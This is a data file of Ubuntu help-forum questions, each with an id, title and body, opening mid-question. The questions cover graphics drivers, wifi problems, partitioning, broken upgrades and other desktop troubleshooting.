unclaimed and could possibly lead to overheating/battery drain , so i am not so happy about that . ubuntu 12.04 lts with fglrx i started here , and experienced a bug when the igpu was selected . this bug manifests itself whenever the screen is locked , the laptop lid is closed , or even when the computer is left inactive with something like xscreensaver installed instead with no lockscreen enabled . it causes a black screen with a moveable cursor only ; switching tty and back does not recover , and a restart from the tty is needed . it does not happen every single time but happens pretty regularly , at least once or twice day . all saved work is lost . i tried both the fglrx in the repos , and the latest 13.10 from the amd website . no change . when the dgpu is selected instead ( from the amd catalyst control centre , or ultimately by pxpress ) this bug does not occur , but i had another bug which i wo n't bother getting into here . ubuntu 13.10 with fglrx a very similar bug here but not quite as severe . exactly the same conditions , namely lockscreen , lidclose , inactivity ( if xscreensaver is being used ) . this time the frozen screen is not black , but a picture of your desktop at the moment of the freeze , again with moveable cursor . here i only tried the latest fglrx amd drivers 13.10 . again no problems with just the i915 driver ( no fglrx ) and again no problems with dgpu selected . some things i tried : 1 ) disabling vsync . i tried this both in compiz settings manager , and by aticonfig -- sync-vsync=off followed by reboot . no change . 2 ) turning dpms off . option `` dpms '' `` false '' in the xorg.conf monitor stanza . ( of course , i also changing gnome settings `` do nothing/do n't suspend '' for battery and ac too ) .no change . 3 ) option `` aiglx '' `` off '' in server flags of xorg.conf . no change . 4 ) modifying the atieventsd so it worked properly for ubuntu , see my post here . and also , running without it . no change . 5 ) booting with the options option `` capabilities '' `` 0x00000800 '' option `` kernelmoduleparm '' `` locked-userpages=0 '' option `` noaccel '' `` true '' in the xorg.conf device stanza . no change . 6 ) booting with nomodeset as kernel parameter . no change . 7 ) turning off acpi interaction from aticonfig : -- acpi-services=off -- acpi-display-switch=off no change . why does it work with just intel ? one thing i do n't understand is why it works with the just the intel i915 driver . i thought pxpress would just hand over control to that driver on bootup , so if it worked with the i915 alone , i 'd have expected it to work with pxpress selecting igpu . i know fglrx installs its own libgl implemenation also , but it switches back to the old stock mesa libgl implementation when the intel card is selected ( c.f . /usr/lib/fglrx/switchlibgl python script ) . so when igpu selected , it should be exactly equivalent to life before fglrx after a reboot ?
394509	i 've got my infamous netgear wna3100 working - but it 's flakey , and slow	hi all i decided to make the switch to ubuntu from windows on my main pc as it 's only used for the internet , office work and music . it 's a beefy self built gaming pc but having taken ownership of an xbox one i wo n't be doing much gaming on it anymore . anyway i 've finally got everything running , including spending about 5 hours getting this blasted wifi dongle working . only issue is it takes about a minute to connect to my modem after the ubuntu has loaded up and occasionally experiences random disconnects which take a further minute to connect again . in addition , i 'm running bt infinity fibre optic in my home . wired , i 'm getting a 55mb connection through ubuntu , wireless , i 'm getting a 5mb connection . i 'm using the broadcom 43xx64 drivers for it installed through the wireless network drivers program . is this really the best i 'm going to get out of it ? or am i doing something majorly wrong ? as people who are using this method seem pretty happy with it whereas i 'm having a terrible experience . i do n't want to just give in and go back to windows , that 's not like me , i want to use ubuntu . so please please , any suggestions let me know . if you need info from me just ask . i do n't want to let this beat me .
394511	suddenly ca n't mount truecrypt on 12.04	i have two machines running ubuntu 12.04 , 64bit on my main desktop and 32bit on a netbook . truecrypt 7.1a is installed on both machines . i have an encrypted partition on my main machine , and a backup on a flash drive . i am suddenly unable to mount either the partition or the backup on the main computer , or the backup on the netbook . i get the error `` bad file descriptor '' in every case . i am able to mount the backup with no problem on an old machine running windowsxp . this situation appeared a few weeks ago from one day to the next . has there been a sudden incompatibility between truecrypt and some ubuntu update ?
394512	which linux distros support vmware 's autofit guest feature ?	i currently have two vm 's with my vmware workstation 10.0.1 : linux mint ( cinnamon ) and lubuntu ( lxde ) . the host system is windows 8.1 . with mint , the auto fit guest feature works after installing the vmware tools and rebooting . i can resize as i please and extend to multiple monitors . all works . with lubuntu however , nothing works . i have to adjust the resolution manually , and oddly enough 1920x1080 is missing entirely . i searched for a solution and i guess i could hack something with xrandr , but that seems like too much trouble . could someone please tell me : 1 ) why does auto fit guest work with some distros and not with others ? is this dependent on the gui that is used ? ( cinnamon vs. lxde ) 2 ) which distros/guis do support the feature out of the box ? thanks
394514	empty trash - nautilus consumes 6.7gb of ram ubuntu 13.10 64 bit	i was building a directory from the command prompt and by accident initialized the entire home directory instead of the folder that i wanted , is there a way to undo this ? the readme.md is in the trash along with some folder that must have been created as i have no clue what it represents the name is all goofy . i try to delete the files from trash and natulis soon ends up consuming 7gb of my 8gb of ram . so basically is there a way to de-initialize this directory ? thank you , edit i did use the following command rm -rf .git and the home directory was no longer a git repo , but i still can not delete the files i have in my trash , my system immediately become unusable for awhile until i either hold the power button down or use the system monitor to end the nautilus process , any help would be appreciated .
394515	xlib : extension `` glx '' missing on display `` :0 ''	i am trying to run skyrim under wine . i requested help in the wine forum , and they told me it was n't a wine problem and directed me here . i have tried running it with and without nvidia-current and nvidia-current-updates . i have tried on wine 1.7 , 1.6 , and 1.5 . i can not find a help topic that fixes my problem . i have been looking for two days . playonlinux does not work either . i am running ubuntu 64 bit 12.04 server edition with i3 . i have a nvidia geforce 730m graphics card with 4 gb of video memory . i have quad core i7 and 12 gb of ram . graphical instructions will not work , as i am using neither unity nor gnome nor kde ( as i have said before , i am using i3 ) .
394518	how do i create a live usb installer from a mac ?	i have a new pc and i want to install ubuntu on it . i only have a mac to create the installation medium . how can i create a live usb for installation ?
394521	wifi not detected xubuntu 13.10	i 'm running xubuntu 13.10 on a compaq presario v2000 with a brcm 4318 wireless card . when i turn it on xubuntu does n't attempt to search for wireless networks , instead saying the ethernet is offline . i have installed b43-fwcutter and the drivers from the install media . what can i do to make xubuntu attempt to connect ?
394523	help ! fail to install ubuntu from usb disk and ca n't back to windows 8	i follow the guide , using universal usb installer 1.9 . i do n't creat a new disk before intallation , and i modify my computer to boot from usb disk ( in bios , boot item , i choose `` legacy only '' ) . all is well until the following : the disks ( /dev/sdb* ) are : no matter what disk i choose , the prompt infomation is the same . so i back and back , and walk into the ubuntu system , i found nothing . so i click the up-right button choosing `` logout '' , and terrible things happened : 1.i can not restart or shutdown ubuntu . when i click the button `` restart '' or `` shut down '' , it shows no reaction . i even tried log in . all i know is my windows 8 username and password , but ubuntu does n't recognize them . it said : invalid password . i realized my computer was stuck in this link . i can not log in ubuntu . can not restart or shut down . so i decided to give a positive closing . but afer that , i could n't boot from usb disk ! it just shows the first ubuntu picture and then no reaction ! the computer screen is in a big black and only a white cursor was flashing on the left up corner . i still can not go back to windows . which means the whole computer doesnot work ! what should i do now ? thank you in advance .
394524	4gb file size restriction on fat32 external hdd	i have an external 1tb hdd that is formatted in fat32 . i use it to connect to my blu-ray player , which has a usb port , to watch movies . frequently , movie files are over 4gb and will not transfer to the drive from my computer . the blu-ray player will only recognize the fat32 file system . is there a way to overcome this within ubuntu ? perhaps a terminal command that i am not aware of ? as a last resort , can you recommend a program that will split the file in half , transfer it the external hdd , and re-assemble it there ? any advice will be appreciated . when i use the split -b command , the second file that it creates is unreadable . i am perplexed . can anyone recommend methods of splitting the file using ffmpeg or mencoder ? i have read about both , but have not been able to do what i need done with them .
394525	no drivers , ca n't connect to internet , how to install synaptic	i recently installed ubuntu 12.10 . after installing ubuntu , i could n't connect to my wifi because i ca n't find my wifi on the wireless connection list . i followed what the guy said here http : //ubuntuforums.org/showthread.php ? t=1953774 and ended up with the guy who needed help . how do i fix these problems ? please answer asap . thanks edit : now that i know what 's wrong . i downloaded the needed libs , now everytime i try to install synaptic it ends up with `` processing triggers for man-db '' . is it good news or bad news ?
394527	ubuntu 13.10 dash will not open	my ubuntu 13.10 dash will not open the icon is there on the launcher but when i click on it it does nothing . ive already tried reinstalling it and restarting the system but to no avail . any suggestions on how it can be fixed ?
394529	home dir files disappeared	my home dir seems to have reset back to its initial install state . i would think that were true except for the fact that the directories i had created still exist . all the files that were there ( even in those directories ) are just gone . i doubt the files are completely gone but not sure what happened and of course how to get everything back . the last thing i was doing was using amarok and copying music from cd to my local hard drive . i shutdown and upon turning the system back on is when i noticed this issue . no recent updates . fsck reported no errors no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise any ideas on how to recover ? thanks !
394532	every restart resets my keyboard shortcuts	i have gnome-do on super+space but the system has super+space on change text input , although i have the text change disabled i have to re-designate my key bindings for gnome-do . i am running ubuntu 13.10 .
394533	can i make virtualbox replicate its server to another machine for online redundancy ?	i would like to create a vm server using a hyper-visor and have it replicated to another physical box so that if the main hyper-visor or vm goes down the second one takes over . is there a way to do this in virtual-box or another hyper-visor ? i have heard esxi can do this but my hardware does not support esxi apparently .
394536	unity dash is unbearably slow after upgrade ( 13.10 32-bit )	i recently upgraded a 12.04 lts wubi installation to 13.10 . the unity dash is nearly impossible to use on 13.10 due to the immense amount of lag it produces when opening , taking about 8 seconds to open , frame by frame . typing is recognized at an average of two letters per second . on top of that the top area of the screen is flashing with slightly slanted yellow and black lines ( lack of a better description ) while it is open . i am used a modified dell latitude d610 , with 1gb of ram and an ( as recognized by windows ) ati radeon mobility x300 graphics card . output from /usr/lib/nux/unity_support_test -p says unity 3d is supposed to run fine : opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rv370 opengl version string : 2.1 mesa 9.2.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes something obviously changed in the way unity renders the dash . is there a way to revert to the old rendering ? upgrade to a different driver ? i do n't know .
394537	burning ubuntu 12.04.3 in to dvd errors ?	i am trying to install ubuntu 12.04.3 . it said a couple errors and then said it finished and ejected dvd after it hit 100 % . when i try to view properties of dvd to see if it even had anything on it and it says that the dvd has 0 bytes on used/free space . i 'm new to this so if this is how it should be then sorry . but any help would be appreciated because i do n't wan na boot into a bad burnt dvd . also burning dvd too approximately 2 minutes .
394538	shortcuts for terminal for running a java program	i wrote a java program first time on linux . this is where my program test.java is located : desktop > apcs ( folder ) > chapter5 ( folder ) > test.java i know that to compile i have to type javac test.java and to run `` java test '' . before that , i have to type cd desktop , cd apcs , cd chapter5 . is there any short way to navigate to test.java ?
394541	graphics issues when loading the live environment to install ubuntu	i am trying to install ubuntu 13.10 64-bit on my pc . when i boot , it displays the ubuntu logo and it is running something in the terminal ( i think it is extracting vmlinuz ) . after that , it just displays a lot of colors . i am trying to see and i can see that ubuntu is loading ( ubuntu logo with five dots below the logo ) . after that my screen is blank and that is happening again , but the shapes are different . the first one is horizontal and the second one is scrambled . how do i fix this ? specifications ⠀intel core i5 cpu 3.10 ghz ⠀8gb ram ⠀digital allience 1gb ( the display by amd ) ( forgot the series ) ⠀1366 x 768 display
394542	what should i do in this step ?	note : please be careful to think this question as duplicate . 1.i chose install ubuntu 12.04 alongside windows 8 . 2.there is just one ntfs disk c in my computer . 3.i doesnot create a new disk before boot from usb disk . the guide doesnot mention this step . i have read the similar question but it doesnot help . it seems that i should partition my disk first . but how ? is there some buttons to partition ? i donot know how does this picture come up : looks like i miss something . thank you in advance .
394544	wifi for some users and not others	i have done a fresh install of kubuntu release 13.10 saucy salamander on a laptop . i 've create two accounts both administrator one for me and one for my son . my account has wifi with a little icon appearing in the bottom panel . for both accounts ifconfig show eth0 connection and wlan0 but for my son the wlan0 does n't get an ipnumber and there is has no wifi icon and i not find any utility that will fire it up . i did a few user tweaks along the way but ca n't see why one users has wifi and not the other . system setting is a little retarded with not much in the way of connection settings . /etc/network/interfaces has a minimal configuration auto lo iface lo inet loopback where is the rest of the configuration taken ? it looks like it can be different for different users ? ! !
394545	system seems slow - i do n't think i 'm using the right gfx driver	my system has two dual core amd athlon processors and 4gb of memory . ati rs690 ( radeon x12oo series ) onboard chips provide the graphics . yet the machine seemed a little slow with 12.10 and apps were crashing , including compiz ( compiz was also getting 100 % + of the cpus at times ) . i did an inline upgrade to 13.04 and the desktop would n't display , i only had a blank screen . i ran the following commands ( askubuntu entry ) : sudo apt-get remove -- purge fglrx* sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg sudo reboot and was able to restore the desktop , but i wonder if i 'm still using the wrong graphics driver . running sudo lshw -c video provided the following info : *-display unclaimed description : vga compatible controller product : rs690 [ radeon x1200 ] vendor : advanced micro devices [ amd ] nee ati physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=64 resources : memory : f0000000-f7ffffff memory : fdef0000-fdefffff ioport : ee00 ( size=256 ) memory : fdd00000-fddfffff so i figured it was seeing the hardware correctly . the ati rs690 shows to be supported by ubuntu and should be capable of 3d graphics but glxinfo | grep renderer shows opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) which i believe is a generic driver . i also get the results below from unity_support_test /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) opengl version string : 2.1 mesa 9.1.7 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no shows that 13.04 is running software rendering and that 3d is not supported ! can someone please help me understand why the system is using software rendering and not doing 3d . i 'm willing to buy a pcie gfx card if that 's what it takes . how to fix this ?
394546	compiz not starting up on ubuntu 12.04	i 'm having a problem where compiz or whatever launcher is n't starting up when i boot up my ubuntu 12.04 . i got the error message once saying compiz was n't starting up , then i tried to reboot , and now i did n't even get that message . i just get my desktop icons , but no menu bars so i ca n't run anything . help ?
394548	ubuntu 13.04 64bit on pentium 4 , 2 ghz with 2 gb ram	please advice can i run ubuntu 13.04 64bit on pentium 4 cpu of 2 ghz clock , 2gb ram with nvidia 210 gpu with 1 gb ram .
394549	text editors on ubuntu software center	please suggest a text editor for writing my java programs . it should be similar to notepad++ . should have : syntax highlighting , tabs , be colorful , and other advanced features leading to ease in writing programs . also , it should be in ubuntu software center as i am not able to download text editors from chrome . i downloaded scite text editor but it is not that colorful as n++ . looking for something better . thank you .
394550	help needed for installation	i am loading from a usb drive using the procedure recommened on the ubuntu site . after i choose ubuntu on the boot menu it shows a black screen which says , completing the ubunti installation . for more installation boot options , press 'esc ' now ... it has remained there for more than two hours . am i doing something wrong ?
394551	ubuntu 13.10 wifi fail after attempting to connect to an ad-hoc network	my wifi was working for several months with the network-manager in ubuntu . a couple of days ago , i tried to connect to an ad-hoc network . afterwards i have not been able to connect to any wireless networks . i tried both network-manager and command line tools . has anyone had this problem before , and has any idea what permanent configuration changes attempting to connect to an ad hoc network might cause ? note that iwlist scan works fine , and even network-manager can see the wireless networks . i simply can not connect anymore , and keep getting these messages from dmesg : [ 3084.305735 ] wlan0 : send auth to 00:18:01 : ea : e7:2c ( try 1/3 ) [ 3084.311016 ] wlan0 : authenticated [ 3084.311101 ] iwlwifi 0000:03:00.0 wlan0 : disabling ht/vht due to wep/tkip use [ 3084.314983 ] wlan0 : associate with 00:18:01 : ea : e7:2c ( try 1/3 ) [ 3084.419117 ] wlan0 : associate with 00:18:01 : ea : e7:2c ( try 2/3 ) [ 3084.523236 ] wlan0 : associate with 00:18:01 : ea : e7:2c ( try 3/3 ) [ 3084.631359 ] wlan0 : association with 00:18:01 : ea : e7:2c timed out [ 3084.641166 ] wlan0 : deauthenticating from 00:18:01 : ea : e7:2c by local choice ( reaso n=3 )
394554	which filesystem is this volume , i want to mount to an ubuntu server ?	mount shows errors like wrong fs type , bad option , bad superblock , missing codepage or helper program , or other error ... . i just tried to mount it as fat mount /dev/sdf /home/ubuntu/sdf -t vfat how can i find the filesystem type so i can mount it ?
394558	updating rhythmbox failed	i updated my rhythmbox2.99.1 to 3.0.1 manually using the terminal but still the update manager tries to update rhythmbox 's core and ends up in update failed , report this problem and when i try to report , the applet displays this problem can not be reported . this is not an official ubuntu package . please remove any third party packages and try again . i am using ubuntu13.10 i am a new linux user
394561	diablo iii play on linux	i 'm using the playonlinux program to install diablo iii on my ubuntu 12.04 os . i get to a point where it says please wait while vcrun2008 sp1 x86 is installed ... it then stays at this point forever . do i need to install it a different way ? on a side note , when i start playonlinux it gives me an error box that says : playonlinux is unable to find 32bits opengl libraries - you might encounter problem with your games and also a separate error from wine playonlinux can not find wine i 'm not sure if that has anything to do with it or if this is a separate issue . i used the following commands to install playonlinux : wget -q `` http : //deb.playonlinux.com/public.gpg '' -o- | sudo apt-key add - sudo wget http : //deb.playonlinux.com/playonlinux_precise.list -o /etc/apt/sources.list.d/playonlinux.list sudo apt-get update sudo apt-get install playonlinux any help appreciated .
394564	blanking screen @ 30 second intervals for no apparent reason	my screen keeps blanking at 30 seconds if nothing is touched or moved . it seems to have started after a recent update . i have tried changing screen-saver settings , xset values , and installing caffeine . caffeine , in spite of being active , appears to have no effect what so ever . nothing seems to work . does anyone have any ideas , as this is beginning to drive me potty ? jvo .
394566	which button should i hit ?	even after reading this excellent answer at how do i install ubuntu ? , i still do not know how to get over the partition problem . because there is no `` edit '' button . rakesh godhala said : in sb4 , there is 480 gb disk space , you can create required space from that partition this is what i do : click the sb4 . click `` change '' button . ( there is no `` edit '' button for me to hit ) select as shown : click `` ok '' , and then i get the following : you can see the sb4 type is changed to ext4 . and i dare not click `` continue '' , because i fear it will erase my windows 8 . also , it did not ask me to set space size , i think this is the wrong step . and i get stuck . so what should i do ?
394567	nexus 7 ubuntu ppa error	fallowing this https : //wiki.ubuntu.com/nexus7/installation when add the ppa and update it will give me failed to fetch 404 w : failed to fetch http : //ppa.launchpad.net/ubuntu-nexus7/ubuntu-nexus7-installer/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ubuntu-nexus7/ubuntu-nexus7-installer/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
394571	how to fix : monitor 's speaker volume resets to max upon system restart ?	how can i set monitor 's speakers volume to be remembered after system restart ? if every change would be hard to remember i 'd like to at least set default volume . the samsung monitor is detected as a syncmaster via hdmi and ( i guess ) processed by graphics card mobile amd ati radeon hd 7340 .
394574	restoring my system from a simplebackup	my system will not start the gui due to a problem caused by installing vmware player . a more detailed post on that resides here i use simplebackup and am wondering if i should restore the system from that . but how extensively ? since it appears the xorg.conf file is compromised , just that file or everything in /var/ , /etc/ , /usr/ ? the only major change was instally vmware on saturday . luckily , a full back-up was just done in the early hours of saturday morning . thanks for taking the time to read this and any help you can offer .
394576	installation help for apache web server	i can download the package form synaptic package manager . when i select a package to download then it says that- please select a disk labeled ubuntu 13.10_saucy salamander_-release amd64 ( 20131016.1 ) in drive/media/cdrom/ what is it and how to resolve it ? please help me
394577	how solve this problem ( e : could not open lock file /var/lib/dpkg/lock )	anil @ anil-pc : ~ $ sudo apt-get install appgrid e : could not open lock file /var/lib/dpkg/lock - open ( 2 : no such file or directory ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
394578	how to block a process for certain time in ubuntu 13.04	i am running a automatic incremental backup in network , at that time if thunderbird is running on client computer then backup is not completed that 's why i need to know if there is any command to block a process for certain time for example thunderbird etc .
394580	how to time sync two systems in same network ?	i want my laptop to derive it 's clock time from another system which is located in another building.both the systems use ubuntu 12.04
394586	upgrade from 13.04 to 13.10 failed and broken dependencies	i tried running the upgrade from my ubuntu 13.04 to 13.10 but it failed to upgrade a latex package with the error from [ here ] ( upgrading from 13.04 to 13.10 stops ) and calmed to try to roll back . however the computer clams to be on 13.10 . when i try to run apt-get install i get : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libboost-chrono1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-date-time1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-filesystem1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-graph-parallel1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-graph1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-iostreams1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-locale1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-math1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-mpi1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-program-options1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-python1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-random1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-regex1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-serialization1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-signals1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-system1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-test1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-thread1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-timer1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed libboost-wave1.49-dev : depends : libboost1.49-dev ( = 1.49.0-4 ) but 1.49.0-3.2ubuntu1 is installed e : unmet dependencies . try using -f. and when i try apt-get -f install i get the error : the following extra packages will be installed : libboost1.49-dev suggested packages : libboost1.49-doc xsltproc docbook-xsl fop the following packages will be upgraded : libboost1.49-dev 1 upgraded , 0 newly installed , 0 to remove and 23 not upgraded . 40 not fully installed or removed . need to get 0 b/9,208 kb of archives . after this operation , 36.9 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 598837 files and directories currently installed . ) preparing to replace libboost1.49-dev 1.49.0-3.2ubuntu1 ( using ... /libboost1.49-dev_1.49.0-4_amd64.deb ) ... unpacking replacement libboost1.49-dev ... dpkg : error processing /var/cache/apt/archives/libboost1.49-dev_1.49.0-4_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/bcp ' , which is also in package libboost1.53-tools-dev 1.53.0-6+exp3ubuntu8 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libboost1.49-dev_1.49.0-4_amd64 i considered removing a re-downloading boost but do n't what to make my system any weirder and less stable . any suggestions on the best way to fix this problem and any other the failed upgrade might have made ?
394589	error in android source code ( base_rules.mk:134 : )	i found a error when i try to build android source code , i am given the spec . what to do for this and what is that mean ? any suggestion would be appreciated . root @ q-desktop : /home/q/working_directory # make -j4 platform_version_codename=rel platform_version=4.4.3.2.1.000.000 target_product=aosp_arm target_build_variant=eng target_build_type=release target_build_apps= target_arch=arm target_arch_variant=armv7-a target_cpu_variant=generic host_arch=x86 host_os=linux host_os_extra=linux-2.6.32-54-generic-x86_64-with-ubuntu-10.04-lucid host_build_type=release build_id=openmaster out_dir=/root/.home/coutput/working_directory build/core/base_rules.mk:134 : *** out/target/common/obj/java_libraries/android_stubs_current_intermediates/classes : module.target.java_libraries.javax.obex already defined by frameworks/base/obex . stop .
394590	scrambled ubuntu server 12.04.3 lts screen	i just installed ubuntu server 12.04.3 lts . the installer worked fine and the boot loader comes up correct . however after the boot loader the screen shows scrambled text eventually landing on this . if i enter login info it will log me in but the screen is still scrambled . i 'm not sure how or why this is and why the installer worked as well as the boot loader but not the loading messages and login prompt and after . any help would be appreciated .
394593	trying to hide unity sidebar completely in saucy	i 'm trying to hide the unity sidebar - completely . i know there are several posts about this , and i 've followed them , but still have not gotten the ( admittedly picky ) results for which i 'm looking . i currently have the sidebar set to autohide , with the reveal mouse sensitivity to the lowest setting , and i 've even used compiz-config to shrink the icons to 8-point size . however , when i launch or minimize an application , the icon for the application in question reveals . also , when i first log in , the bar reveals momentarily . i 'd like to disable these , and i have a feeling that i 'm overlooking some painfully obvious setting in unity-tweak-tool or ccsm ... .any suggestions ?
394594	steam ? ubuntu 12.04 ? windows ? wine ? play onlinux ?	ok i have playonlinux downloaded and steam downloaded as well . i bought a windows game from the steam store and im trying to create a virtual disk to install and play ? can anyone assist me please ? thanks .
394595	about iphone not locked but ubuntu says differently	when i plug in my iphone4 ios7 to my computer ( dell vostro 3750 ) on ubuntu 12.04 it says it is locked and to enter the passcode and try again but my phone is not locked at all . is there a solution ?
394599	have problems resizing ntfs disk . what should i do to create a 10gb free space disk ?	rakesh godhala said : you can select the partition as ntfs , resize the partition to 470gb . so i click the /dev/sdb4 , `` change ... '' button , comes up `` edit partition '' dialog . but after selecting `` use as '' to `` ntfs '' , there is no option for me to resize the c partition to 470gb . so , what should i do to create a 10gb free space disk ? could you please tell me which buttons i should hit to get over this problem ? all buttons are showed in the pictures i have uploaded at : which button should i hit ? . ok , i chose `` something else '' , because i can not choose `` replace windows 8 with ubuntu '' . i click `` continue '' , so i faced the dialog ( as the two pictures in previous question show ) . i do not know which buttons should i hit . this is the picture :
394601	enable ethernet for wired connection	i moved my computer to a different city . at the old location i could simply plug in ethernet and have internet . it appears in the new location this is not the case . internet works and router works with all other devices ... .am i missing something . -dynamic ip in in effect is there a way that i have to re enable lan ?
394602	best graphics driver for hp laptop with switchable graphics ?	i 'm planning to dual boot my laptop with windows 7 and ubuntu 13.10 . i 'm using an hp pavilion dv6-6140tx laptop , which is packed with amd 6770m 1gb gpu . for windows , i 'm using a third party amd ccc driver and it works like charm and gpu switching happens butter smooth . i just want to know where i can find the best driver for ubuntu ( for my laptop ) ?
394605	wireless connection not working in ubuntu 13.10	i have a problem establishing wi-fi connection in ubuntu . wired connection is working fine ( all updates installed ) , the problem is i can not connect to wireless . i can see a lot of networks around me , but i can not see my router . sometimes i can see it , i try to connect but connection fails . i have also tried connecting to my hotspot , but no success . other machines are using wi-fi with no problem . i am a newbie to linux , so if anyone can guide me how to install drivers , etc . please help .
394606	12.04 not recognizing data on usb	i recently got the sims 3 , and copied the iso to my computer which runs windows 7 . i then moved the iso to my laptop , which runs ubuntu 12.04 , and it would mount the iso , but it would appear to be empty . i then tried to open the iso in the archive manager , and it gave me this error : cd-rom is not in iso 9660 format so , instead of trying to mess with it , i went back to my desktop , thinking it was just ubuntu not supporting this iso . so i extracted the files from the iso , then moved them to my usb drive . when i plugged my usb drive back into my laptop , ubuntu read the usb , but only says that there are two folders on the usb , and no other files , such as the rest of the files i had put on there . it still says that there is 6 gb used by the usb drive , but there is nothing there . why is it doing this ? could it be something with the formatting of the programs ? how could i fix this ? edit 1 : i think i found a solution , and am testing now . edit 2 : did not work , still not showing certain files . i can open the iso in archive manager , but when i try to extract the files , it only shows two folders , just like last time .
394609	remuser by root	my server load stays constantly at 1.0 and above , there are a bunch of 9000 's processes owed by root that take over the server with priority 20 and all of them have on the command column `` remuser '' . what is this and if is an intrusion how do i fix it . also when the above happens the top command shows 3 users after the up time . are these users visiting websites on the server or users logged in the shell . thank you .
394610	why are my desktop icons really small and without text ?	i just installed a fresh ubuntu 13.10 and observed the following behavior : my desktop icons are all very tiny and the corresponding file names are not displayed . the following example shows my desktop containing a few libreoffice documents and a pdf : is this behavior expected ? and what can i do to get more traditional desktop icons ( larger , with text ) ? so far i tried not to do anything like unity -- reset ( which apparently is no longer supported in 13.10 anyways ) because the icon problem was already present in the very first boot after the fresh installation , and it would be great if i wo n't lose all other unity settings that i have configured in the last few hours .
394615	wifi is not working in ubuntu 12.04	the problem is confusing when i boot live usb wi-fi works perfectly but when i install it on my laptop ( hp pavilion ) ..it doesnât work although it connects with wi-fi router.my os is edubuntu ( 12.04 ) .
394617	best way to establish connection between ubuntu server and arduino board	i have ubuntu server 12.04 and i would like to have an arduino as a client which connects whenever a tag is placed on it . i have used protocols like snmp to connect to a switch before but am not sure if the same applies to arduino
394618	colour calibration of windows gets disturbed	i have installed ubuntu 13.10 inside windows 7 but every time i log into the ubuntu and then re -login to windows7 , i found my win7 color calibration changed and thus have to recalibrate it again & again . pl help .
